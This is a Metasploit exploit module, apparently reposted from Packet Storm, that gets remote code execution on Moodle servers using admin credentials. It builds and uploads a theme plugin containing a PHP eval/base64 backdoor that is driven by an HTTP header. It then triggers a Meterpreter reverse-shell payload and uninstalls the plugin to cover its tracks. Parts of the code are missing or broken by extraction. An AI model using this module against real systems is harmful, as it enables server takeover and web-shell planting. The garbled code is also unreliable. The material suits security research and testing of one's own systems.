Moodle Admin Shell Upload ≈ Packet Storm

# This module requires Metasploit:
# Current source:

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Post::File
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Moodle

def initialize(info = {})
'Name' => 'Moodle Admin Shell Upload',
'Description' => %q{
This module will generate a plugin which can receive a malicious
payload request and upload it to a server running Moodle
provided valid admin credentials are used. Then the payload
is sent for execution, and the plugin uninstalled.

You must have an admin account to exploit this vulnerability.

Successfully tested against 3.6.3, 3.8.0, 3.9.0, 3.10.0, 3.11.2
'License' => MSF_LICENSE,
'Author' => [
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
'h00die' # msf module cleanup and inclusion
'References' => [
['URL', ''],
['EDB', '46775'],
['CVE', '2019-11631'] # rejected, its a feature!
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Automatic', {}]],
'Privileged' => false,
'DisclosureDate' => '2019-04-28',
'DefaultTarget' => 0,
'DefaultOptions' => { 'Payload' => 'php/meterpreter/reverse_tcp' },
'Payload' => {
'BadChars' => "'",
'Space' => 6070 # apache default is 8196, but 35% overhead for base64 encoding
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],

['USERNAME', [true, 'Admin username to authenticate with', 'admin']),'PASSWORD', [false, 'Admin password to authenticate with', ''])

def create_addon_file
# There are syntax errors in creating zip file. So the payload was sent as base64.
plugin_file =
header = Rex::Text.rand_text_alpha_upper(4)
plugin_name = Rex::Text.rand_text_alpha_lower(8)

print_status("Creating plugin named: #{plugin_name} with poisoned header: #{header}")

path = "#{plugin_name}/version.php"
path2 = "#{plugin_name}/lang/en/theme_#{plugin_name}.php"
# "$plugin->version" and "$plugin->component" contents are required to accept Moodle plugin.
plugin_file.add_file(path, "<?php $plugin->version = #{}; $plugin->component = 'theme_#{plugin_name}';")
plugin_file.add_file(path2, "<?php eval(base64_decode($_SERVER['HTTP_#{header}'])); ?>")
# plugin_file.add_file(path2, "<?php #{payload.encoded}) ?>")
return plugin_file.pack, header, plugin_name

def exec_code(plugin_name, header)
# Base64 was encoded in "PHP". This process was sent as "HTTP headers".
print_status('Triggering payload')
'keep_cookies' => true,
'uri' => normalize_uri(target_uri.path, 'theme', plugin_name, 'lang', 'en', "theme_#{plugin_name}.php"),
'raw_headers' => "#{header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"

def check
v = moodle_version
return CheckCode::Detected('Unable to determine moodle version') if v.nil?

# This is a feature, not a vuln, so we assume this to work on 3.0.0+
# assuming the plugin arch changed before that.
# > 3.0, < 3.9
version =
if version >'3.0.0')
return CheckCode::Appears("Exploitable Moodle version #{v} detected")

CheckCode::Safe("Non-exploitable Moodle version #{v} detected")

def exploit
v = moodle_version
fail_with(Failure::NoTarget, 'Unable to determine moodle version') if v.nil?

version =
print_status("Authenticating as user: #{datastore['USERNAME']}")
cookies = moodle_login(datastore['USERNAME'], datastore['PASSWORD'])
fail_with(Failure::NoAccess, 'Unable to login. Check credentials') if cookies.nil? || cookies.empty?
cookies.each do |cookie|

print_good("Authentication was successful with user: #{datastore['USERNAME']}")
print_status('Creating addon file')
addon_content, header, addon_name = create_addon_file
print_status('Uploading addon')
file_id, sesskey = upload_addon(addon_name, version, addon_content)
fail_with(Failure::NoAccess, 'Unable to upload addon. Make sure you are able to upload plugins with current permissions') if file_id.nil?
print_good('Upload Successful. Integrating addon')
ret = plugin_integration(sesskey, file_id, addon_name)
if ret.nil?
fail_with(Failure::NoAccess, 'Install not successful')
exec_code(addon_name, header)
print_status('Uninstalling plugin after 5 second delay so payload can change directories')
remove_plugin("theme_#{addon_name}", version, sesskey)

def on_new_session(_)
print_good('You will need to change directories on meterpreter to get full functionality. Try: cd /tmp')


Pensée du jour :

Ce que l'homme fait ,

l'homme peut le défaire.


"No secure path in the world"